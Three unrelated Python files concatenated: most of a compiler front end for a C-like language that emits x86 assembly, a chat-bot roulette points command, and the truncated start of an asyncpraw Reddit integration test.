norm_scratch_registers_inuse, ralloc, rfree,
rfreeAll, sse_parameter_registers,
sse_scratch_registers,
sse_scratch_registers_inuse)
from Classes.Constexpr import buildConstantSet, determineConstexpr
import Classes.ExpressionComponent as EC
from Classes.DType import DType, type_precedence
from Classes.Error import *
from Classes.Location import Location
from Classes.Token import *
from Classes.Token import Token
from Classes.Variable import Variable
from Function import Function
from globals import BOOL, CHAR, DOUBLE, INT, INTRINSICS, LONG, SHORT, VOID, OPERATORS
from Lexer import Lexer
from Structure import Structure
import copy
_asm_extern_indicator = "extern"
#####################################
#
# The Compiler class is used to compile global variables,
# isolate structures, and isolate functions.
# Functions are compiled in the Function class.
#
# \see Token
# \see Variable
# \see Function
# \see compile.py
# \see globals
#
######################################
class Compiler:
def __init__(self):
self.globals: list = [] # all global variables
self.constants: str = "" # raw assembly for constant definitions
# raw assembly for heap definitions (.bss)
self.heap: str = ""
# raw assembly for initialization of heap definitions
self.initializers: str = ""
# raw assembly to call the given entrypoint (usually main)
self.entry: str = ""
self.text: str = "" # raw .text assembly
self.inittext: str = "" # raw init assembly
self.fini: str = "" # raw fini assembly
self.currentfname: str = "" # current filename
self.currentTokens: list = [] # current tokens: Token
self.currentfunction: Function = None # for fn compiletime
self.current_token: Token = None # current token
self.ctidx: int = 0 # index of current_token in self.currentTokens
self.prevtok: Token = Token(T_AMBIGUOUS, T_AMBIGUOUS, None, None)
self.functions: list = [] # all Function objects
self.template_functions: list = [] # function templates
self.templatefunction_cache: list = [] # already created function templates
self.types: list = [] # all datatypes: DType
self.template_types: list = [] # templated types
self.template_cache: list = [] # already filled templates for speed
# Store enums:
# format: {
#
# "<Enum Item Name>" : (DType, value: int)
#
# }
self.enums: dict = {} # all enums
# typedefs listed as (old, new):(DType,DType)
self.tdefs: list = []
# a hash table for faster access to typedefs
self.tdef_hash = {}
for i in INTRINSICS: # fill types with primitives
self.types.append(i.copy())
self.possible_members: list = []
self.heap_unnamed: int = 0 # int counter for unnamed heap variables
# an array of all function types (handled differently)
self.fntypes = []
# panicmode means continue compiling, but there has already been an
# error
self.panicmode: bool = False
# ensure a semicolon was used, and move on
def checkSemi(self) -> None:
if(self.current_token.tok != T_ENDL):
throw(ExpectedSemicolon(self.currentTokens[self.ctidx - 1]))
self.advance()
def isType(self, q: str) -> bool: # return: if q is type
return self.getType(
q) is not None or self.getTemplateType(q) is not None
def isIntrinsic(self, q: str) -> DType: # return: if q is primitive
return next((t for t in INTRINSICS if self.Tequals(t.name, q)), None)
def ismember(self, q: str) -> bool:
return q in self.possible_members
def getGlob(self, q: str) -> Variable: # get global variable of name q
# find a variable based on name
out: Variable = next((g for g in self.globals if g.name == q), None)
# return out if found
if(out is not None):
return out
# check for functions of that name
fn: Function = self.getFunction(q)
# return None if none found
if(fn is None):
return None
# if function is found, find it's corresponding global variable:
return self.getGlob(fn.getCallingLabel()
) if not fn.extern else self.getGlob(fn.name)
def getTemplateType(self, q: str) -> DType:
return next((t for t in self.template_types if t[0].name == q), None)
def getFunction(self, q: str) -> Function: # get first function of name q
return next((f for f in self.functions if f.name == q), None)
def advance(self): # move to next token
# increment index
self.ctidx += 1
# set previous token
self.prevtok = self.current_token
try:
self.current_token = self.currentTokens[self.ctidx]
except BaseException:
throw(UnexepectedEOFError(self.current_token))
def addTdef(self, old, new):
self.tdefs.append((old, new))
if old.name in self.tdef_hash:
self.tdef_hash[old.name].append(new.name)
else:
self.tdef_hash[old.name] = [new.name]
def skipBody(self):
self.advance()
opens = 1
while(opens != 0):
self.advance()
if(self.current_token.tok == T_OPENSCOPE):
opens += 1
elif(self.current_token.tok == T_CLSSCOPE):
opens -= 1
# determine DType equality (including typedefs)
def Tequals(self, ta: str, tb: str) -> bool:
# if given names are equal, the types must be
if(ta == tb):
return True
if ta in self.tdef_hash:
return tb in self.tdef_hash[ta]
elif tb in self.tdef_hash:
return ta in self.tdef_hash[tb]
return False
# find a typedef pair in the list which equates the two types
# return next((True for tdef in self.tdefs if (
# (tdef[0].name == ta and tdef[1].name == tb) or (tdef[0].name == tb and tdef[1].name == ta))), False)
def getType(self, qu: str) -> DType: # get type of name q
# search types for a datatype that shares a name with the querry
out: DType = next((t for t in self.types if t.name == qu), None)
# if none exists, return
if(out is None):
return None
# return safe copy of the type with the restored pointer depth
out = out.copy()
return out
def deriveBaseType(self, t: DType) -> DType:
for base in self.tdef_hash:
if t.name not in self.tdef_hash and t.name in self.tdef_hash[base]:
return self.getType(base)
return t
def parseTemplate(self) -> list:
types = []
# loop through layer of decorator (' <int, double ... > ' )
while self.current_token.tok != ">":
self.advance()
t: DType = self.checkType()
t = self.deriveBaseType(t)
types.append(t)
return types
def parseFnDeclParameters(self, checkvarnames=True):
if self.current_token.tok != "(":
throw(ExpectedToken(self.current_token, "("))
self.advance()
parameters = []
while self.current_token.tok != T_CLSP:
t = self.checkType()
if checkvarnames:
if(self.current_token.tok != T_ID):
throw(ExpectedIdentifier(self.current_token))
varname = self.current_token.value
self.advance()
else:
varname = "~"
parameters.append(Variable(t, varname, isptr=t.ptrdepth > 0))
if (self.current_token.tok == T_CLSP):
break
if(self.current_token.tok != T_COMMA):
throw(ExpectedComma(self.current_token))
self.advance()
self.advance()
return parameters
def parseFunctionType(self):
self.advance()
rett = self.checkType()
parameters = self.parseFnDeclParameters(False)
fnout = Function("", parameters, rett, self, [])
typeout = DType(
f"function {fnout.createTypename()}",
8,
function_template=fnout
)
return typeout
# check next tokens for Type, and return it as a DType
def checkType(self, err=True):
# within checkForType, if err is set to True,
# an error can be thrown on bad syntax or undefined
# types. When err is not set, None is returned in
# cases where it would normally throw an error.
signed = True
# check for a sign specifier
if(self.current_token.tok == T_KEYWORD):
if(self.current_token.value == "unsigned"):
signed = False
self.advance()
elif(self.current_token.value == "signed"):
self.advance()
elif (self.current_token.value == "function"):
return self.parseFunctionType()
# ensure syntax
if(self.current_token.tok != T_ID):
# respond to bad syntax based on err flag
if err:
throw(ExpectedIdentifier(self.current_token))
else:
return None
# make sure that the type exists
if(not self.isType(self.current_token.value)):
# respond to bad type based on err flag
if err:
throw(ExpectedType(self.current_token))
else:
return None
# check for a decorator (template types specifier)
if (self.currentTokens[self.ctidx + 1].tok == "<"):
# collect template info:
template = self.current_token.value
ttok = self.current_token
self.advance()
types = self.parseTemplate()
# querry compiler for a new type based on template types
t = self.buildTemplateType(template, types, ttok).copy()
else:
# otherwise, querry compiler for a type based on a typename
t = self.getType(self.current_token.value).copy()
self.advance()
# get pointer depth:
ptrdepth = t.ptrdepth
while self.current_token.tok == "*":
ptrdepth += 1
self.advance()
# update type properties
t.ptrdepth = ptrdepth
t.signed = signed
return t
def checkId(self) -> str:
if self.current_token.tok != T_ID:
throw(ExpectedIdentifier(self.current_token))
out = self.current_token.value
self.advance()
return out
# create a constant string value in self.constants
def createStringConstant(self, content) -> None:
# d = (.data instructions, varname)
d: tuple = createStringConstant(content)
name: str = d[1]
cnst: str = d[0]
# add constant info
self.constants += cnst
# add new Variable
v = Variable(CHAR.copy(), name, glob=True)
self.globals.append(v)
# create an arbitrary constant in self.constants
def buildGlobal(self, extern=False) -> None:
# track start
startidx = self.ctidx
# check for a datatype
intr = self.checkType()
# check for an identifier
name = self.checkId()
# check for simple C style function declarations
if(self.current_token.tok == T_OPENP or self.current_token.tok == T_NAMESPACE):
# update indexes, and pass control onto the buildFunction function
self.ctidx = startidx - 1
self.advance()
self.buildFunction()
return
# check for multiple declarations
if self.getGlob(name) is not None:
fatalThrow(VariableRedeclaration(
self.currentTokens[self.ctidx - 1], name))
dtok = self.currentTokens[self.ctidx - 1]
# variables declared with extern are not placed in the data section, and are simply
# recorded for use by the compiler.
if(extern):
# cannot assign values declared with extern
if(self.current_token.tok == T_EQUALS):
throw(AssigningExternedValue(self.current_token))
# add new variable
self.globals.append(Variable(intr.copy(), name, glob=True))
self.globals[-1].dtok = dtok
# close
self.checkSemi()
return
# test for early endline
if (self.current_token.tok != T_EQUALS):
# if there is no assignment, these variables can be moved to the bss section because they
# are uninitialized.
if(self.current_token.tok == T_ENDL):
# create uninilitialized var
self.globals.append(
Variable(
intr.copy(),
name,
glob=True,
initializer=0))
self.globals[-1].dtok = dtok
# since the var has no initializer, it is stored in the .bss
# section
# handle structures
if not intr.isintrinsic():
self.createGlobalStructure(self.globals[-1], dtok, True)
else:
self.heap += f"{name}: resb {intr.csize()}\n"
# close
self.advance()
return
else:
# if there is no initializer, there must be a semicolon
throw(ExpectedValue(self.current_token))
self.advance()
# Tokens need to be collected to be passed through the constexpr evaluator.
# \see Classes.Constexpr
# tokens representing an expression:
exprtokens = []
# determine if the expression is a set literal: (e.g {1,2,3})
isSet = False
if(self.current_token.tok == T_OPENSCOPE):
isSet = True
# loop through expression tokens until a semicolon
while(self.current_token.tok != T_ENDL):
exprtokens.append(self.current_token)
self.advance()
# use the constexpr evaluator to find the value for the global
value: EC.ExpressionComponent = determineConstexpr(intr.isflt(), exprtokens, Function(
"CMAININIT", [], LONG.copy(), self, exprtokens), True) if not isSet else buildConstantSet(intr.isflt(), exprtokens, Function(
"CMAININIT", [], LONG.copy(), self, exprtokens))
isptr = False
# if the final value is a variable, the initializer to that variable is
# taken
if(isinstance(value.accessor, Variable)):
# value.accessor = value.accessor.name if intr.ptrdepth == value.accessor.t.ptrdepth + \
# 1 else value.accessor.initializer
#isptr = True
if value.accessor.glob and value.accessor.t.ptrdepth > 0:
value.accessor = value.accessor.name
elif value.accessor.glob:
value.accessor = value.accessor.initializer
# add new Variable
self.globals.append(Variable(intr.copy(), name,
glob=True, initializer=value.accessor, isptr=isptr))
self.globals[-1].dtok = dtok
# add .data instructions to self.constants
self.constants += createIntrinsicConstant(self.globals[-1])
if not intr.isintrinsic():
self.createGlobalStructure(self.globals[-1], dtok, False)
# close
self.checkSemi()
def createGlobalStructure(self, var, dtok, addToHeap, starter=""):
if addToHeap:
self.heap += f"{var.name}:\n"
# implicit constructor
implicitConstructor = var.t.getConstructor([var.t.up])
if implicitConstructor is not None:
self.inittext += f"mov rdi, {var.name}\n{fncall(implicitConstructor)}"
destructor = var.t.destructor
if destructor is not None:
self.fini += f"mov rdi, {var.name}\n{fncall(destructor)}"
size_added = 0
for v in var.t.members:
if isinstance(v.initializer, Function):
continue
self.globals.append(
Variable(v.t, f"{starter}{var.name}.{v.name}", glob=True)
)
self.globals[-1].dtok = dtok
if addToHeap:
size_added += v.t.csize()
self.heap += f"{self.globals[-1].name}: resb {v.t.csize()}\n"
if addToHeap and size_added != var.t.csize():
self.heap += f"resb {var.t.csize()-size_added}\n"
# isolate a function and build a Function object
def buildFunction(self, thisp=False, thispt=None,
constructor=False, destructor=False) -> None:
# track if the function is explicitly inline
inline = False
autodecl = False
operator = False
# constructor and destructor as special flags set by the Structure class
# for compiling constructors and destructors
if not constructor and not destructor:
# under normal conditions:
# check for extra info specifier
if(self.current_token.tok == T_KEYWORD):
# inline specifier
if(self.current_token.value == "inline"):
inline = True
# Check for auto specifier
if self.current_token.tok == T_KEYWORD and self.current_token.value == "auto":
# handle a function defined with auto
autodecl = True
rettype = DType("auto", 8)
self.advance()
# normal returntype:
else:
# check for a returntype
rettype = self.checkType()
# if this is a destructor or constructor:
else:
assert thisp
rettype = VOID.copy()
# parent structure
struct = None
# for external definitions of member functions:
# (The '::' token will be in place of an '(')
if(self.currentTokens[self.ctidx + 1].tok == T_NAMESPACE):
# if(self.current_token.tok != T_ID):
# throw(ExpectedIdentifier(self.current_token))
sname = self.checkId()
# get parent
struct = self.getType(sname)
if(struct is None):
throw(UnkownType(self.prevtok))
# setup function for a 'this' value
thisp = True
thispt = struct
# self.advance()
self.advance()
# operator specifier
if(self.current_token.value == "operator"):
#inline = True
operator = True
self.advance()
# record token that declared the function
dtok = self.current_token
if not operator:
# get fnname
name = self.checkId()
else:
name = self.current_token.value
if name not in OPERATORS:
throw(UnkownOperator(name))
self.advance()
if name == "[" or name == "(":
self.advance()
# ensure syntax
if(self.current_token.tok != T_OPENP):
throw(ExpectedParethesis(self.current_token))
self.advance()
# construct parameters:
parameters = []
# thisp means that this function is a member, and should have 'this' as
# it's first parameter
if(thisp):
parameters.append(
Variable(
thispt.bottom().up(),
"this",
isptr=True))
# denoted by '...'
variardic = False
# count of each type of parameter
ssecount = 0
normcount = int(thisp)
# load parameters until end of fn header at ')'
while self.current_token.tok != T_CLSP:
# check for variardic
if(self.current_token.tok == T_ELIPSES):
variardic = True
self.advance()
break
# get parameter type
t = self.checkType()
# increment param types
ssecount += t.isflt()
normcount += not t.isflt()
# get parameter name
varname = self.checkId()
# add new variable
parameters.append(Variable(t, varname, isptr=t.ptrdepth > 0))
parameters[-1].dtok = self.currentTokens[self.ctidx - 1]
# loop handle:
if (self.current_token.tok == T_CLSP):
break
# ensure syntax
if(self.current_token.tok != T_COMMA):
throw(ExpectedComma(self.current_token))
self.advance()
self.advance()
# check for early end (just declaration, no assignment)
if(self.current_token.tok == T_ENDL):
self.advance()
# create empty function for assignment later
f = Function(
name,
parameters,
rettype,
self,
[],
return_auto=autodecl,
declare_token=dtok)
fndtype = DType(
f"function {f.createTypename()}",
8,
function_template=f
)
self.globals.append(
Variable(
fndtype,
f.getCallingLabel(),
glob=True,
isptr=True,
mutable=False,
signed=f.returntype.signed))
self.globals[-1].dtok = f.declare_token
self.functions.append(f)
return
# if not declaration, it must be an assignment
if(self.current_token.tok != T_OPENSCOPE):
throw(ExpectedToken(self.current_token, T_OPENSCOPE))
self.advance()
# isolate the body of the function
# (keep track of scope open / scope close)
opens = 1
start = self.ctidx
# loop through one layer of { ... } scope to
# catch range of tokens used as function body
while opens > 0:
if(self.current_token.tok == T_OPENSCOPE):
opens += 1
if(self.current_token.tok == T_CLSSCOPE):
opens -= 1
self.advance()
# construct final object
f = Function(name, parameters, rettype, self,
self.currentTokens[start:self.ctidx], return_auto=autodecl, inline=inline, declare_token=dtok)
f.unassigned = False
# pre-compile f to determine it's returntype
if f.return_auto:
# track warning settings
ogwarn = config.__nowarn__
config.__nowarn__ = True
# compile f before other functions
f.compile()
# restore warning settings
config.__nowarn__ = ogwarn
# check if there was a return,
if f.returntype.name == "auto":
# if not, the default type is void
f.returntype = VOID.copy()
f.isCompiled = False
rettype = f.returntype
# setup member fn
if thisp:
f.memberfn = True
f.parentstruct = thispt
# variardic
f.variardic = variardic
# handle additional parameters...
# the extra parameters needed are any parameters not able to be stored in the
# SSE registers and the regular registers
# extra params from sse
extra_params = (ssecount - len(sse_parameter_registers))
if extra_params < 0:
extra_params = 0
# extra params from regular
extra_params += (normcount - len(norm_parameter_registers))
# load info to f
f.extra_params = extra_params
f.ssepcount = ssecount
f.normpcount = normcount
self.functions.append(f)
fndtype = DType(
f"function {f.createTypename()}",
8,
function_template=f
)
# add as a variable for fn pointers
self.globals.append(
Variable(
fndtype,
f.getCallingLabel(),
glob=True,
isptr=True,
mutable=False,
signed=f.returntype.signed))
self.globals[-1].dtok = f.declare_token
# isolate and build a structure
def buildStruct(self, thisp=False, thispt=None,
templated=False, tns=None) -> None:
# \see Structure
# structure wrapper
parser = Structure(self, templated, tns)
try:
parser.construct()
except Error as e:
print(e.__repr__())
self.skipBody()
self.advance()
self.checkSemi()
self.types.pop()
def buildEnum(self, thisp=False, thispt=None) -> None:
pass
def compile(self, ftup: list) -> None: # main function to perform Compiler tasks
self.currentTokens = ftup
# The first step in compilation is finding all string constants (except inline asm blocks) and float constants
# in order to transfer them to the .data section as global variables.
c = 0
for t in self.currentTokens:
# convert string constants to global variables
if t.tok == T_STRING:
# preserve assembly blocks
if(self.currentTokens[c - 2].tok != T_KEYWORD and self.currentTokens[c - 2].value != "__asm"):
# construct a string constant
data: tuple = createStringConstant(t.value)
name: str = data[1]
instruct: str = data[0]
# get datatype for string
tp = CHAR.copy()
tp.ptrdepth = 1
# build Variable
v = Variable(tp, name, glob=True,
isptr=True, initializer=f"`{t.value}`")
self.globals.append(v)
# update token for later use
t.tok = T_ID
t.value = name
# add allocator to constants
#self.constants += instruct
c += 1
# reset
self.current_token = self.currentTokens[0]
self.ctidx = 0
# actual compilation step
while self.current_token.tok != T_EOF:
self.compileLine()
def buildTemplate(self):
# keep track of first token for errors
first = self.currentTokens[self.ctidx - 1]
# ensure syntax
if(self.current_token.tok != "<"):
throw(ExpectedToken(self.current_token, "<"))
# collect standin typenames from the template list
tns = []
while self.current_token.tok != ">":
self.advance()
# expecting a 'struct', 'class', or 'typename'
if(self.current_token.tok != T_KEYWORD):
throw(ExpectedToken(self.current_token, "type-specifier"))
self.advance()
# check for typename
tname = self.checkId()
tns.append(tname)
self.advance()
# keep track of the current number of types to restore back to after
# the template has been created
restore_types = len(self.types)
for t in tns:
self.types.append(DType(t, 0))
# structs are a simpler process that can be streamlined:
if(self.current_token.value == "struct"):
restorefn = len(self.functions)
self.buildStruct(templated=True, tns=tns)
self.functions = self.functions[:restorefn]
#newt = self.types.pop()
# templated types have their own special list
# self.template_types[-1].append(tns)
# functions:
else:
# tracker is used to ensure that a function is actually created
# as this line is compiled
tracker = len(self.functions)
self.compileLine()
if(tracker == len(self.functions)):
throw(VariableTemplate(first))
fnt = self.functions.pop()
# update the created function as a template
fnt.isTemplate = True
fnt.template_types = tns
self.template_functions.append(fnt)
# delete standin types, and return to original state
self.types = self.types[:restore_types]
def buildTemplateType(self, template, types, tok):
# check for existing templates:
for t in self.template_cache:
# they share a name
if t[0] == template:
# they have the same number of types
if len(t[1]) != len(types):
break
# fulleq = ''.join([str(ty) for ty in t[1]]) == ''.join(
# [str(ty) for ty in types])
fulleq = all((t[1][i].__eq__(types[i])
for i in range(len(types))))
if fulleq:
return t[2].copy()
# get the template structure from the list:
tstruct = self.getTemplateType(template)
if(tstruct is None):
throw(UnkownIdentifier(tok))
# the template structure needs a deep copy of properties and members
# so that it can be used to instantiate multiple different template
# structure types
struct = tstruct[0].copy()
# deep copy
for i in range(len(tstruct[0].members)):
struct.members[i] = tstruct[0].members[i].copy()
# the second item is an array of typenames used in place of actual types in the
# structure's definition
tns = tstruct[1]
# assosiation is a dictionary that associates the typenames of the template with their
# actual types given in this declaration
assosiation = {}
for i in range(len(tns)):
assosiation[tns[i]] = types[i].copy()
# all the members of the new templated type need to be given their new
# types, and offsets
struct.s = 0
struct.name += ''.join([t.name for t in types])
for member in struct.members:
# if template has effect:
if(member.t.name in tns):
# update type, but maintain pointer depth
pd = member.t.ptrdepth
member.t = assosiation[member.t.name].copy()
member.t.ptrdepth += pd
if(isinstance(member.initializer, Function)):
pass
else:
# apply offset, and overall size
member.offset = struct.s
struct.s += member.t.csize()
for member in struct.members:
if(isinstance(member.initializer, Function)):
member.initializer = member.initializer.deepCopy()
member.initializer.parameters[0].t = struct.up()
member.initializer = self.buildTemplateFunction(
member.initializer, tns, types)
for i in range(len(struct.constructors)):
struct.constructors[i] = struct.constructors[i].deepCopy()
struct.constructors[i] = self.buildTemplateFunction(
struct.constructors[i].deepCopy(), tns, types)
if struct.destructor is not None:
struct.destructor = struct.destructor.deepCopy()
struct.destructor = self.buildTemplateFunction(
struct.destructor, tns, types)
for op in struct.operators:
for i in range(len(struct.operators[op])):
struct.operators[op][i] = struct.operators[op][i].deepCopy()
struct.operators[op][i].parameters[0].t = struct.up()
struct.operators[op][i] = self.buildTemplateFunction(
struct.operators[op][i], tns, types
)
self.template_cache.append([template, types, struct])
return struct.copy()
# build / get a template function based on template parameters
def buildTemplateFunction(self, templatefn, tns, types):
# restore the types if necessary
restore_types = len(self.types)
restore_tdefs = len(self.tdefs)
restore_tdefhash = copy.deepcopy(self.tdef_hash)
# create semi-copy function
fn = Function(
templatefn.name,
templatefn.parameters,
templatefn.returntype,
self,
templatefn.tokens,
templatefn.inline,
templatefn.extern,
0,
templatefn.memberfn,
templatefn.parentstruct)
# update returntype standin if necessary
if fn.returntype.name in tns:
fn.returntype = types[tns.index(fn.returntype.name)]
# replace parameter types with their new values if specified in the
# template
for i in range(len(fn.parameters)):
p = fn.parameters[i]
if p.t.name in tns:
fn.parameters[i] = fn.parameters[i].copy()
pd = fn.parameters[i].t.ptrdepth
fn.parameters[i].t = types[tns.index(p.t.name)].copy()
fn.parameters[i].t.ptrdepth += pd
# check for function type parameters using the templated type
if fn.parameters[i].t.function_template is not None:
fn.parameters[i].t.function_template = self.buildTemplateFunction(fn.parameters[i].t.function_template, tns, types)
# check if the function has already been built before
fnexist = templatefn.getFunction(
fn.name, [p.t for p in fn.parameters], fn.returntype, loose=False)
# if it has been built, just use the existing build
if(fnexist is not None):
fn = fnexist
else:
# if it's not been built, the new temporary types need to be added
# to compile the template function.
for i in range(len(tns)):
temptype = types[i].copy()
temptype.name = tns[i]
self.types.append(temptype)
self.tdefs.append((types[i], temptype))
if types[i].name in self.tdef_hash:
self.tdef_hash[types[i].name].append(temptype.name)
else:
self.tdef_hash[types[i].name] = [temptype.name]
# if it is not already built, it needs to be compiled
if not fn.isCompiled:
# compile
fn.compile()
# save
self.functions.append(fn)
# update
fn.isCompiled = True
fn.isTemplate = True
if not fn.inline:
self.text = f"{fn.asm}{self.text}"
# restore types if necessary
self.types = self.types[:restore_types]
self.tdefs = self.tdefs[:restore_tdefs]
self.tdef_hash = restore_tdefhash
return fn
# unsigned keyword is always followed by a normal variable
# declaration.
def buildUnsigned(self, thisp=False, thispt=None) -> None:
s = self.current_token
self.advance()
self.buildGlobal()
v = self.globals[-1]
if(v.isflt()):
throw(InvalidSignSpecifier(s))
v.signed = False
v.t = v.t.copy()
v.t.signed = False
v.glob = True
def buildSafetype(self, thisp=False, thispt=None) -> None:
self.advance()
tat = self.current_token
typeAName = self.checkType()
typeBName = self.checkId()
typeA = self.getType(typeAName)
if typeA is None:
fatalThrow(ExpectedType(tat))
newtype = typeA.copy()
newtype.name = typeBName
self.types.append(newtype)
self.checkSemi()
# typedef is always followed by two types and an endline:
def buildTypedef(self, thisp=False, thispt=None) -> None:
# start token
s = self.current_token
self.advance()
# type a
ta = self.checkType()
if(self.current_token.tok != T_ID):
throw(ExpectedIdentifier(self.current_token))
# check for layered typedefs
if ta.name in self.tdef_hash:
ogt = self.tdef_hash[ta.name][0]
if ogt in ['char', 'short',
'int', "long", "float",
"double", "void"]:
ta.name = ogt
# new type name
ntn = self.current_token.value
newtype = ta.copy()
newtype.name = ntn
# add new typename to precedence list, if applicable
if ta.name in type_precedence:
type_precedence[ntn] = type_precedence[ta.name]
# add new type to types and tdefs
self.types.append(newtype.copy())
self.tdefs.append((ta, newtype))
# setup hash table for fast access
if ta.name in self.tdef_hash:
self.tdef_hash[ta.name].append(newtype.name)
else:
self.tdef_hash[ta.name] = [newtype.name]
if newtype.name in self.tdef_hash:
self.tdef_hash[newtype.name].append(ta.name)
else:
self.tdef_hash[newtype.name] = [ta.name]
if(self.isIntrinsic(ntn)):
INTRINSICS.append(newtype.copy())
self.advance()
self.checkSemi()
def determineFunctionOrVar(self) -> None:
self.advance()
# record location to jump back to
backto = self.ctidx - 1
self.checkType()
# account for operator overloads
if self.current_token.tok == T_KEYWORD and self.current_token.value == 'operator':
self.advance()
self.advance()
# function determinant:
# for function delcarations fndp.tok will always be a '(', and for variables
# it will always be something else.
fndp = self.current_token
# with the determinant, jump back to the begining to
# perform the compilation
self.ctidx = backto
self.advance()
return fndp
# extern is followed by either a function declaration or a
# variable declaration
def buildExtern(self, thisp=False, thispt=None) -> None:
# function determinant
fndp = self.determineFunctionOrVar()
if(fndp.tok == "(" or fndp.tok == T_NAMESPACE): # if is function
self.buildFunction(thisp=thisp, thispt=thispt)
fn = self.functions[-1]
config.__CEXTERNS__ += f"{_asm_extern_indicator} " + \
functionlabel(fn)[:-1] + "\n"
glob = self.globals[-1]
glob.name = fn.getCallingLabel()
else: # if is variable
self.buildGlobal(True)
config.__CEXTERNS__ += f"{_asm_extern_indicator} " + \
self.globals[-1].name + "\n"
# same code as extern, with slight modification for cextern
def buildCextern(self, thisp=False, thispt=None) -> None:
fndp = self.determineFunctionOrVar()
if(fndp.tok == "(" or fndp.tok == T_NAMESPACE):
self.buildFunction(thisp=thisp, thispt=thispt)
fn = self.functions[-1]
fn.extern = True
config.__CEXTERNS__ += f"{_asm_extern_indicator} " + \
functionlabel(fn)[:-1] + "\n"
glob = self.globals[-1]
glob.name = fn.getCallingLabel()
else:
self.buildGlobal(True)
config.__CEXTERNS__ += f"{_asm_extern_indicator} " + \
self.globals[-1].name + "\n"
# __cdecl is always followed by a function declaration
def buildCdecl(self, thisp=False, thispt=None) -> None:
self.advance()
self.buildFunction(thisp=thisp, thispt=thispt)
fn = self.functions[-1]
fn.extern = True
# apply new properties to generated function:
config.__CEXTERNS__ += "global " + \
functionlabel(fn)[:-1] + "\n"
glob = self.globals[-1]
glob.name = fn.getCallingLabel()
# global is always followed by a function declaration
def buildGlobalfn(self, thisp=False, thispt=None) -> None:
self.advance()
self.buildFunction(thisp=thisp, thispt=thispt)
# apply global properties
fn = self.functions[-1]
config.__CEXTERNS__ += "global " + \
functionlabel(fn)[:-1] + "\n"
glob = self.globals[-1]
glob.name = fn.getCallingLabel()
# inline is always followed by a function declaration
def buildInlinefn(self, thisp=False, thispt=None) -> None:
self.advance()
self.buildFunction(thisp=thisp, thispt=thispt)
# apply new properties
if(not config.__Osize__):
self.functions[-1].inline = True
self.globals.pop()
else:
self.functions[-1].wouldbe_inline = True
def buildNormalfn(self, thisp=False, thispt=None) -> None:
self.advance()
self.buildFunction(thisp=thisp, thispt=thispt)
def buildWinextern(self, thisp=False, thispt=None) -> None:
self.buildCextern(thisp, thispt)
self.functions[-1].winextern = True
def buildAutofn(self, thisp=False, thispt=None) -> None:
self.buildFunction(thisp=thisp, thispt=thispt)
def beginTemplate(self, thisp=False, thispt=None) -> None:
self.advance()
self.buildTemplate()
# compileLine is responsible for determining the categorie of a general unscoped statement.
# e.g: unsigned int i = 0;
# e.g: int main(int argc) {}
# And then either compiling the line if its just a global variable, or sectioning it off to
# be handled by the Structure element or the Function element for more
# complex statements.
def compileLine(self, thisp=False, thispt=None):
# lines begining with an ID will be a global variable
# (Or function, but that is handled in createConstant())
if (self.current_token.tok == T_ID):
self.buildGlobal()
elif (self.current_token.tok == T_KEYWORD):
# check if a response exists for given keyword
if self.current_token.value in keyword_responses:
# execute respnse
keyword_responses[self.current_token.value](
self, thisp, thispt)
else:
# if not, throw error
throw(UnexpectedToken(self.current_token))
else:
throw(UnexpectedToken(self.current_token))
def verify_entrypoint(self, f):
# check returntype
if f.returntype.isflt():
print(InvalidMainReturn(f.declare_token).__repr__())
self.panicmode = True
# check valid parameters
if len(f.parameters) > 0:
# check parameter 1
if not (f.parameters[0].t.__eq__(INT)
or f.parameters[0].t.__eq__(LONG)):
warn(InvalidMainParameters(f.parameters[0].dtok))
# check for parameter 2
if len(f.parameters) > 1:
# check the parameter 2 type
if not (f.parameters[1].t.__eq__(CHAR.up().up())):
warn(InvalidMainParameters(f.parameters[1].dtok))
# compile all functions and fill in raw assembly info
def finalize(self):
# the Compiler needs to find the best suitable entrypoint.
# The first function called main will be used, reguardless of
# returntype, or parameters.
for f in self.functions:
if f.name == "main":
self.verify_entrypoint(f)
self.entry = f
f.extern = True
f.winextern = True
self.globals.append(
Variable(
DType(
f"function {f.createTypename()}",
8,
function_template=f
),
"main",
glob=True,
initializer=f,
isptr=True,
)
)
self.globals[-1].dtok = f.declare_token
# at this point all functions exist as Function objects, but have not
# been compiled into asm.
for f in (self.functions):
# TODO: Set up some size optimizations
# if(config.__Osize__):
# if f.wouldbe_inline and f.references == 0:
# f.inline = True
if not f.inline and not f.isTemplate:
self.currentfunction = f
# catch errors to continue compilation
try:
f.compile()
except Error as e:
# assuming the error is non fatal:
print(e.__repr__())
rfreeAll()
continue
if(True in norm_scratch_registers_inuse or True in sse_scratch_registers_inuse):
print(
f"Warning:\n\tRegister leak of degree {norm_scratch_registers_inuse.count(True)+sse_scratch_registers_inuse.count(True)} found in function:\n\t {f}\n\t called from: {config.LAST_RALLOC}\n")
rfreeAll() # make sure there are no register leaks between functions
# add comment
if(config.DO_DEBUG):
f.asm = f"\n\n\n;{f.__repr__()}\n\n\n\n\n{f.asm}"
self.text = f"{self.text}{f.asm}"
# garbage collection
f.GC()
for v in self.globals:
if v.name.startswith("__LC.S"):
self.constants += f"{v.name}: db {v.initializer}, 0\n"
# Keyword responses outlines the functions that the compiler will use for a given
# keyword.
keyword_responses = {
"unsigned": Compiler.buildUnsigned,
"typedef": Compiler.buildTypedef,
"extern": Compiler.buildExtern,
"cextern": Compiler.buildCextern,
"__cdecl": Compiler.buildCdecl,
"global": Compiler.buildGlobalfn,
"struct": Compiler.buildStruct,
"inline": Compiler.buildInlinefn,
"function": Compiler.buildNormalfn,
"winextern": Compiler.buildWinextern,
"template": Compiler.beginTemplate,
"auto": Compiler.buildAutofn,
"enum": Compiler.buildEnum,
"class": Compiler.buildStruct,
"safetype": Compiler.buildSafetype
}
|
import random
from impbot.core import base
from impbot.handlers import command
class RouletteHandler(command.CommandHandler):
def run_roulette(self, message: base.Message, points: int) -> str:
starting_points = int(self.data.get(message.user.name, default="0"))
if starting_points < points:
if not starting_points:
raise base.UserError("You don't have any points!")
elif starting_points == 1:
raise base.UserError("You only have 1 point.")
raise base.UserError(f"You only have {starting_points} points.")
if random.randint(0, 1):
new_points = starting_points + points
self.data.set(message.user.name, str(new_points))
return (f"{message.user} won {points} points and now has "
f"{new_points} points!")
else:
new_points = starting_points - points
self.data.set(message.user.name, str(new_points))
return (f"{message.user} lost {points} points and now has "
f"{new_points} points.")
|
"""Test asyncpraw.models.front."""
from .. import IntegrationTest
class TestFront(IntegrationTest):
async def test_best(self):
with self.use_cassette():
submissions = await self.async_list(self.reddit.front.best())
assert len(submissions) == 100
async def test_controversial(self):
with self.use_cassette():
